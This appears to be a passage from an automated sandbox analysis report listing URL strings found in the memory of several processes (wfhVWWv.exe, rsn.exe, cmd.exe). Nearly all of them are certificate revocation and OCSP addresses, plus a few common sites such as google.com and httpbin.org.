Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331242201.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332363528.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000002.3341653407.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331242201.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000002.3341653407.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330653249.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340603314.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331242201.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330623335.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330845517.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332363528.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330653249.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.cr
Source: pyexpat.pyd.39.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000002.3341653407.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: rsn.exe, 00000009.00000002.3344900049.00000000037B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/
Source: rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://json.org
Source: wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digi
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000002.3341653407.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329927047.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331242201.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332363528.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000002.3341653407.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331242201.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329995713.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330653249.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340603314.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331242201.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330623335.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330845517.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, 